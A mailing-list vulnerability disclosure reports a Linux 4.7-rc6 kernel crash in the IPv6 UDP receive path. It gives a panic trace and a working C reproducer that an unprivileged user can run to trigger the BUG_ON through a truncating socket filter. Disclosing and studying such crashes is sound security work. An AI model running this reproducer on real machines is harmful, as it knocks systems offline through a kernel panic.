Date: Tue, 5 Jul 2016 18:36:55 +0800
From: Marco Grassi <marco.gra@...il.com>
To: oss-security@...ts.openwall.com
Subject: BUG_ON crash in linux 4.7-rc6/master skbuff.c

Hi,

This program crashes the Linux kernel 4.7-rc6 and current master: it trips a
BUG_ON in net/core/skbuff.c:3051, which ends in a deliberate panic() call.

kernel BUG at net/core/skbuff.c:3051!

Reproduced in a QEMU environment with KASAN enabled, in a syzkaller-style setup.

---- crash trace ----

[   59.831394] kernel BUG at net/core/skbuff.c:3051!
[   59.831802] invalid opcode: 0000 [#1] SMP KASAN
[   59.832193] Modules linked in:
[   59.832488] CPU: 0 PID: 1651 Comm: derp2 Not tainted 4.7.0-rc6 #1
[   59.833022] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
Ubuntu-1.8.2-1ubuntu1 04/01/2014
[   59.833827] task: ffff8800ba26c740 ti: ffff8800b8ba8000 task.ti:
ffff8800b8ba8000
[   59.834498] RIP: 0010:[<ffffffff8292611c>]  [<ffffffff8292611c>]
skb_pull_rcsum+0x1ec/0x2c0
[   59.835238] RSP: 0018:ffff88011b007768  EFLAGS: 00010206
[   59.835705] RAX: ffff8800ba26c740 RBX: ffff880119c338c0 RCX:
ffff880119c33940
[   59.836311] RDX: 0000000000000100 RSI: 0000000000000008 RDI:
ffff880119c33940
[   59.836916] RBP: ffff88011b007798 R08: ffff88011b007700 R09:
0000000000000001
[   59.837521] R10: 1ffff10017742929 R11: ffff880119c33982 R12:
0000000000000001
[   59.838141] R13: 0000000000000008 R14: ffff880119c33998 R15:
ffff8800b88ce490
[   59.838767] FS:  0000000002454880(0000) GS:ffff88011b000000(0000)
knlGS:0000000000000000
[   59.839522] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   59.840017] CR2: 0000000020013000 CR3: 00000000b9940000 CR4:
00000000000006f0
[   59.840631] DR0: 0000000000000000 DR1: 0000000000000000 DR2:
0000000000000000
[   59.841242] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7:
0000000000000400
[   59.841851] Stack:
[   59.842033]  ffff88011b007798 ffff880119c338c0 ffff8800b93d3980
0000000000000000
[   59.842759]  0000000000000000 ffffffff83a8a200 ffff88011b0077f0
ffffffff82c54dba
[   59.843430]  ffff880100000000 0000000000000000 00000001ab123950
ffffffff83a8a200
[   59.844102] Call Trace:
[   59.844317]  <IRQ>
[   59.844495]  [<ffffffff82c54dba>] udpv6_queue_rcv_skb+0x4fa/0x15b0
[   59.845048]  [<ffffffff82c56b36>] __udp6_lib_rcv+0xcc6/0x1d20
[   59.845540]  [<ffffffff82c57bb1>] udpv6_rcv+0x21/0x30
[   59.845975]  [<ffffffff82bf5971>] ip6_input_finish+0x3a1/0x1170
[   59.846510]  [<ffffffff82bf7faa>] ip6_input+0xda/0x1f0
[   59.846950]  [<ffffffff82bf7ed0>] ? ipv6_rcv+0x1790/0x1790
[   59.847418]  [<ffffffff8296ce36>] ? __netif_receive_skb+0x36/0x170
[   59.847944]  [<ffffffff8296d024>] ? netif_receive_skb_internal+0xb4/0x210
[   59.848520]  [<ffffffff82bf53ae>] ip6_rcv_finish+0x11e/0x340
[   59.849002]  [<ffffffff82bf74f0>] ipv6_rcv+0xdb0/0x1790
[   59.849450]  [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[   59.849978]  [<ffffffff811fc519>] ? __enqueue_entity+0x139/0x230
[   59.850517]  [<ffffffff81206100>] ? update_curr+0x150/0x4e0
[   59.850993]  [<ffffffff82bf6740>] ? ip6_input_finish+0x1170/0x1170
[   59.851520]  [<ffffffff8296be64>] __netif_receive_skb_core+0x1754/0x26f0
[   59.852101]  [<ffffffff8296a710>] ? netdev_info+0x120/0x120
[   59.852603]  [<ffffffff8120717b>] ? check_preempt_wakeup+0x50b/0xa70
[   59.853167]  [<ffffffff811e6cd4>] ? check_preempt_curr+0x204/0x350
[   59.853715]  [<ffffffff8296ce2f>] __netif_receive_skb+0x2f/0x170
[   59.854286]  [<ffffffff82971037>] process_backlog+0x197/0x580
[   59.854789]  [<ffffffff8296ea99>] net_rx_action+0x7c9/0xcf0
[   59.855264]  [<ffffffff8296e2d0>] ? sk_busy_loop+0xa00/0xa00
[   59.855760]  [<ffffffff822a8c90>] ? __e1000_maybe_stop_tx+0x200/0x200
[   59.856333]  [<ffffffff82d394d3>] ? __do_softirq+0x403/0x585
[   59.856829]  [<ffffffff82d3929e>] __do_softirq+0x1ce/0x585
[   59.857298]  [<ffffffff82d3800c>] do_softirq_own_stack+0x1c/0x30
[   59.857808]  <EOI>
[   59.857983]  [<ffffffff81172568>] do_softirq.part.19+0x38/0x40
[   59.858535]  [<ffffffff811725ed>] __local_bh_enable_ip+0x7d/0x80
[   59.859048]  [<ffffffff82be694d>] ip6_finish_output2+0x7dd/0x1510
[   59.859568]  [<ffffffff81c3f920>] ? __do_once_done+0x1a0/0x210
[   59.860066]  [<ffffffff82be6170>] ? dst_output+0x80/0x80
[   59.860520]  [<ffffffff8294d670>] ? skb_flow_dissector_init+0x290/0x290
[   59.861082]  [<ffffffff81c31c40>] ? copy_page_from_iter+0xa20/0xa20
[   59.861616]  [<ffffffff815c85a1>] ? memset+0x31/0x40
[   59.862042]  [<ffffffff82bf29f2>] ip6_finish_output+0x302/0x560
[   59.862578]  [<ffffffff82bf4259>] ? __ip6_make_skb+0x1279/0x1bc0
[   59.863127]  [<ffffffff82bf2da3>] ip6_output+0x153/0x390
[   59.863582]  [<ffffffff82bf2c50>] ? ip6_finish_output+0x560/0x560
[   59.864100]  [<ffffffff82bf2fe0>] ? ip6_output+0x390/0x390
[   59.864573]  [<ffffffff82cc3d57>] ip6_local_out+0x87/0xb0
[   59.865036]  [<ffffffff82bf4c2e>] ip6_send_skb+0x8e/0x1b0
[   59.865522]  [<ffffffff82c4decd>] udp_v6_send_skb+0x60d/0x1120
[   59.866021]  [<ffffffff82c4ec08>] udp_v6_push_pending_frames+0x228/0x340
[   59.866643]  [<ffffffff82c4e9e0>] ? udp_v6_send_skb+0x1120/0x1120
[   59.867164]  [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[   59.867677]  [<ffffffff82c5069e>] udpv6_sendmsg+0x189e/0x22e0
[   59.868168]  [<ffffffff82a50d50>] ? ip_reply_glue_bits+0xb0/0xb0
[   59.868693]  [<ffffffff82c4ee00>] ? udp_v6_flush_pending_frames+0xe0/0xe0
[   59.869285]  [<ffffffff813b3ee2>] ? is_ftrace_trampoline+0xc2/0xf0
[   59.869814]  [<ffffffff8109010a>] ? print_context_stack+0x6a/0xf0
[   59.870351]  [<ffffffff814ce4b0>] ? warn_alloc_failed+0x240/0x240
[   59.870883]  [<ffffffff815c2de4>] ? deactivate_slab+0x134/0x3d0
[   59.871387]  [<ffffffff815c1f93>] ? alloc_debug_processing+0x73/0x1b0
[   59.871936]  [<ffffffff82b387bc>] inet_sendmsg+0x24c/0x350
[   59.872405]  [<ffffffff82b38570>] ? inet_recvmsg+0x3d0/0x3d0
[   59.872913]  [<ffffffff829081ff>] sock_sendmsg+0xcf/0x110
[   59.873389]  [<ffffffff82908462>] sock_write_iter+0x222/0x3c0
[   59.873879]  [<ffffffff82908240>] ? sock_sendmsg+0x110/0x110
[   59.874394]  [<ffffffff82c94c07>] ? ip6_datagram_release_cb+0x1e7/0x260
[   59.874969]  [<ffffffff81c2a6cf>] ? iov_iter_init+0xaf/0x1d0
[   59.875453]  [<ffffffff8161d71b>] __vfs_write+0x3cb/0x640
[   59.875915]  [<ffffffff8161d350>] ? default_llseek+0x2c0/0x2c0
[   59.876412]  [<ffffffff81ac3fd7>] ? apparmor_file_permission+0x27/0x30
[   59.876969]  [<ffffffff8162106a>] ? rw_verify_area+0xea/0x2b0
[   59.877460]  [<ffffffff816216b5>] vfs_write+0x175/0x4a0
[   59.877907]  [<ffffffff81624f18>] SyS_write+0xd8/0x1b0
[   59.878364]  [<ffffffff81624e40>] ? SyS_read+0x1b0/0x1b0
[   59.878831]  [<ffffffff811271c9>] ? trace_do_page_fault+0x79/0x240
[   59.879362]  [<ffffffff82d36476>] entry_SYSCALL_64_fastpath+0x1e/0xa8
[   59.879907] Code: fc ff df 48 89 fa 48 c1 ea 03 0f b6 04 02 84 c0 74 08
3c 03 0f 8e ba 00 00 00 80 a3 91 00 00 00 f9 e9 4a ff ff ff e8 b4 fe a4 fe
<0f> 0b e8 ad fe a4 fe 0f 0b e8 a6 fe a4 fe 31 d2 4c 89 ff 44 89
[   59.882261] RIP  [<ffffffff8292611c>] skb_pull_rcsum+0x1ec/0x2c0
[   59.882798]  RSP <ffff88011b007768>
[   59.883143] ---[ end trace d7d3f86c27f0e339 ]---
[   59.883546] Kernel panic - not syncing: Fatal exception in interrupt
[   59.884589] Kernel Offset: disabled
[   59.884906] ---[ end Kernel panic - not syncing: Fatal exception in
interrupt

--- reproducer --- derp2.c ---- gcc derp2.c -o derp2

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>

/*
 * Fallback syscall numbers.  The values are the x86-64 ones, so this
 * reproducer is only meaningful on that ABI (the hard-coded structure
 * layouts in main() assume 64-bit pointers as well).  The #ifndef guards
 * let the libc's <sys/syscall.h> definitions take precedence when present.
 */
#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

/* Return value of each syscall in main(), never inspected.  The gaps in the
 * indices used (0, 1, 3, 6, 13, 14, 21) suggest a larger generated program
 * from which the irrelevant calls were pruned. */
long r[22];

/*
 * Reproducer entry point: a syzkaller-style program that drives a single
 * IPv6 UDP socket through a fixed syscall sequence.  Every pointer argument
 * is a hard-coded address inside the region mapped by the first syscall, and
 * each return value is stored in r[] (pre-filled with -1) but never checked:
 * this is a crash trigger, not a robust program, so a failed mmap() simply
 * segfaults at the first memcpy() instead of reporting an error.
 *
 * Returns 0.  On a vulnerable kernel the process never gets that far, because
 * the final write() ends in the BUG_ON shown in the trace above.
 */
int main()
{
memset(r, -1, sizeof(r));
/* mmap(0x20000000, 0x1e000, PROT_READ|PROT_WRITE (0x3),
 * MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS (0x32), fd = -1, offset = 0):
 * a fixed-address scratch region that all later pointer arguments fall into. */
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x1e000ul, 0x3ul, 0x32ul,
0xfffffffffffffffful, 0x0ul);
/* socket(AF_INET6 (0xa), SOCK_DGRAM (0x2), 0): the UDP/IPv6 socket. */
r[1] = syscall(SYS_socket, 0xaul, 0x2ul, 0x0ul, 0, 0, 0);
/* 128-byte buffer holding a sockaddr_in6 for bind(): family 0x000a, port
 * bytes ab 12, address ::1 (the 0x01 at byte 23).  Everything past the
 * 28-byte structure is zero padding. */
memcpy((void*)0x20006000,
"\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
128);
r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
/* 166 bytes of opaque payload for sendto().  The content looks like
 * fuzzer noise; only its length appears to matter for the trigger (see the
 * note at the final write() below). */
memcpy((void*)0x20017f5a,
"\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\xcc\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1",
166);
/* 28-byte sockaddr_in6 destination: same family, port bytes ab 12 and ::1
 * as the bind address, so the datagram is looped back to this very socket.
 * That is why the trace shows the receive path (udpv6_rcv ...
 * udpv6_queue_rcv_skb) running in softirq context underneath the sender's
 * write(). */
memcpy((void*)0x200001a2,
"\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0",
28);
/* sendto(fd, payload, 166, flags, dst, 28).  The flags word is mostly
 * fuzzer noise, but bit 0x8000 (MSG_MORE) is set, so the 166 bytes are
 * corked on the socket rather than transmitted now -- nothing reaches the
 * receive path yet. */
r[6] = syscall(SYS_sendto, r[1], 0x20017f5aul, 0xa6ul,
0x249e4e54fe149d8cul, 0x200001a2ul, 0x1cul);
/* struct sock_fprog at 0x2001dff0: len = 1, filter = 0x2001d000.
 * The single classic-BPF instruction at 0x2001d000 is
 *   code = 0x06 (BPF_RET|BPF_K), jt = 0xe6 (0x4e6 truncated to uint8_t,
 *   ignored by a RET), jf = 0, k = 1
 * i.e. "accept the packet but keep only its first byte". */
*(uint16_t*)0x2001dff0 = (uint16_t)0x1;
*(uint64_t*)0x2001dff8 = (uint64_t)0x2001d000;
*(uint16_t*)0x2001d000 = (uint16_t)0x6;
*(uint8_t*)0x2001d002 = (uint8_t)0x4e6;
*(uint8_t*)0x2001d003 = (uint8_t)0x0;
*(uint32_t*)0x2001d004 = (uint32_t)0x1;
/* setsockopt(fd, SOL_SOCKET (0x1), SO_ATTACH_FILTER (0x1a), &fprog, 16):
 * installs that filter on the receive side of the same socket.  No
 * privilege is needed for this. */
r[13] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x1aul, 0x2001dff0ul, 0x10ul,
0);
/* dup() the socket; the final write goes through the duplicate. */
r[14] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
/* 40 (0x28) more payload bytes for write(); again fuzzer noise. */
*(uint32_t*)0x20013000 = (uint32_t)0x28;
*(uint32_t*)0x20013004 = (uint32_t)0x2;
*(uint64_t*)0x20013008 = (uint64_t)0x0;
*(uint64_t*)0x20013010 = (uint64_t)0xfffffffffffffff7;
*(uint64_t*)0x20013018 = (uint64_t)0x7;
*(uint16_t*)0x20013020 = (uint16_t)0x1;
/* write(dup_fd, buf, 40) carries no MSG_MORE, so it flushes the corked
 * frame (udp_v6_push_pending_frames in the trace).  The 166 + 40 byte
 * datagram is looped back to the socket and run through the filter, which
 * cuts it to 1 byte -- shorter than the 8-byte UDP header.  The receive
 * path then appears to call skb_pull_rcsum() for the header (RSI = 8 in the
 * register dump is consistent with that) and its BUG_ON fires: an
 * unprivileged local DoS.  The defensive fix belongs in the UDP receive
 * path: drop an skb the socket filter has truncated below
 * sizeof(struct udphdr) instead of asserting on it. */
r[21] = syscall(SYS_write, r[14], 0x20013000ul, 0x28ul, 0, 0, 0);
return 0;
}

----

thank you

Marco

https://marcograss.github.io


